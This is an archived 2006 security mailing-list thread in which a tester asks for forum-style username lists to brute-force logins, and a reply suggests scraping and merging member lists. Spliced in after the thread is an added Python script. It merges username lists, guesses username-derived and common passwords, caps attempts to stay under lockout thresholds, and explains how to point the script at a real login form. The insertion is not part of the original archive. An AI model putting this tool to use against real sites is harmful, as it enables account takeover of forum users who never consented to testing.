WebApp Sec mailing list archives
RE: dictionary of forum style usernames
From: "Griffiths, Ian" <Ian.Griffiths () liv-coll ac uk>
Date: Thu, 4 May 2006 12:50:49 +0100
I'm sure such a list could be derived from an existing member list from any forum out there, wget and some Perl or something, not sure what the ethical stance is on that. I'm not even sure on the ethics of going straight to the member table and picking up the single username field. You would need a forum admin who trusts you to use the stuff appropriately and possibly members who are willing to participate? I'm not sure - it is of course sufficiently anonymised in every other respect.

If you want to brute force this data as it stands though you would also need the set of password hashes as well? Unlikely anyone will give this up too easily!

I would also be interested to see, if you were able to get two member lists of maybe ten thousand members, exactly how much overlap there is between the two lists - my suspicion would be not much. Therefore you might want to consider compounding a few lists so you get maybe 100k names or more.

Ironically, most teenage honey_girl_69x usernames would actually make fantastic passwords, I don't think that was the intention :-)

Ian

-----Original Message-----
From: Robin Wood [mailto:dninja () gmail com]
Sent: 04 May 2006 12:32
To: Griffiths, Ian
Cc: webappsec () securityfocus com
Subject: Re: dictionary of forum style usernames

As I said, the system I'm going to be testing has users whose usernames are going to be forum style (e.g. Luca89, mackerel, Maedhros, Magic Banana, mark_alec) rather than normal "human" name style (e.g. robin, peter, fred).

From previous experience with the site I know that a lot of users use their username as their password, so if I can get a reasonable list, preferably a few hundred at least, I'll try a brute force attack with a selection of common passwords and the username. I'm going to leave this going in the background while doing the rest of the tests, so the more names the better.

I know that the human style name lists exist as my ssh server regularly gets attacked by scripts trying long lists of usernames; does the same exist for forum style names?

On 5/4/06, Griffiths, Ian <Ian.Griffiths () liv-coll ac uk> wrote:

How many records are you thinking? Also what are you aiming to achieve? I currently can't see any place where username actually matters?

Ian

-----Original Message-----
From: Robin Wood [mailto:dninja () gmail com]
Sent: 04 May 2006 08:53
To: webappsec () securityfocus com
Subject: dictionary of forum style usernames

Hi

I'm going to be doing a test against a forum type system and want to have a go at brute forcing a few logins. As it is a forum the login names aren't likely to be usual "human" names, so I'm looking for a dictionary of names to try. Can anyone recommend one?

Robin
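The thread describes two pieces of work: compounding several scraped member lists into one username dictionary and measuring how much they overlap (Ian's suggestion), and then running a username-as-password attack with a short common-password list alongside it (Robin's plan). The script below is an added example that is not part of the original thread or any tool the posters used. The member lists, the common-password list, the salted-hash user table and the fake_login() function are all constructed here so the whole thing runs offline; against a real target, try_login would be replaced by a function that submits the forum's login form, and max_attempts_per_user exists so the loop can be kept under whatever lockout threshold the target is known to enforce.

```python
import hashlib
import itertools
from collections import Counter

# Constructed sample member lists, standing in for lists scraped from two
# different forums. Not data from the original thread.
FORUM_A = ["Luca89", "mackerel", "Maedhros", "Magic Banana", "mark_alec", "honey_girl_69x"]
FORUM_B = ["mackerel", "Luca89", "xXshadowXx", "bob123", "Maedhros"]

# A deliberately tiny common-password list; a real run would use a longer one.
COMMON_PASSWORDS = ["password", "123456", "qwerty", "letmein"]


def merge_lists(*lists):
    """Compound several member lists into one de-duplicated username list and
    report how many names appear in more than one list. Matching is
    case-insensitive; the first spelling seen is the one kept."""
    seen = {}
    for names in lists:
        for name in names:
            seen.setdefault(name.casefold(), name)
    counts = Counter(n.casefold() for names in lists for n in set(names))
    overlap = sum(1 for c in counts.values() if c > 1)
    return list(seen.values()), overlap


def username_mutations(username):
    """Variants of a username that people actually type as their password."""
    base = username.replace(" ", "")
    variants = {username, base, base.lower(), base.capitalize()}
    return [v for v in variants if v]


def candidates(usernames, common=COMMON_PASSWORDS):
    """Yield (username, password) pairs, grouped by user: username-derived
    guesses first, then the common-password list."""
    for user in usernames:
        for pw in username_mutations(user) + list(common):
            yield user, pw


def run_attack(usernames, try_login, max_attempts_per_user=None):
    """Drive try_login(user, password) -> bool over the candidate pairs and
    return {username: password} for every account that accepted a guess.
    max_attempts_per_user caps guesses per account to stay under a lockout."""
    cracked = {}
    for user, group in itertools.groupby(candidates(usernames), key=lambda p: p[0]):
        for i, (_, pw) in enumerate(group):
            if max_attempts_per_user is not None and i >= max_attempts_per_user:
                break
            if try_login(user, pw):
                cracked[user] = pw
                break
    return cracked


# --- Constructed stand-in for the target login form (hypothetical) ---------

_SALT = "s4lt"


def _hash(password, salt=_SALT):
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed user table: several users reused their username, one chose a
# common password, one chose something the wordlist will not find.
FAKE_USER_TABLE = {
    "Luca89": _hash("luca89"),
    "mackerel": _hash("mackerel"),
    "Maedhros": _hash("correct horse battery staple"),
    "Magic Banana": _hash("MagicBanana"),
    "bob123": _hash("letmein"),
}


def fake_login(user, password):
    """Hypothetical login check; replace with a function that posts to the
    real forum's login form and inspects the response."""
    stored = FAKE_USER_TABLE.get(user)
    return stored is not None and stored == _hash(password)


if __name__ == "__main__":
    merged, overlap = merge_lists(FORUM_A, FORUM_B)
    print(f"{len(merged)} unique usernames, {overlap} shared between lists")
    for user, pw in run_attack(merged, fake_login).items():
        print(f"cracked {user!r} with {pw!r}")
```

Names that appear in several lists are counted once, so the overlap figure answers Ian's question directly, and the username-derived guesses are tried before the common list so the accounts Robin expects to fall (username equals password) cost one or two attempts each rather than the whole list.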
------------------------------------------------------------------------- Sponsored by: Watchfire The Twelve Most Common Application-level Hack Attacks Hackers continue to add billions to the cost of doing business online despite security executives' efforts to prevent malicious attacks. This whitepaper identifies the most common methods of attacks that we have seen, and outlines a guideline for developing secure web applications. Download this whitepaper today! https://www.watchfire.com/securearea/whitepapers.aspx?id=701300000007t9r --------------------------------------------------------------------------
Current thread:
- dictionary of forum style usernames Robin Wood (May 04)
- <Possible follow-ups>
- RE: dictionary of forum style usernames Griffiths, Ian (May 04)
- Re: dictionary of forum style usernames Robin Wood (May 04)
- RE: dictionary of forum style usernames Griffiths, Ian (May 04)
- Re: dictionary of forum style usernames Robin Wood (May 04)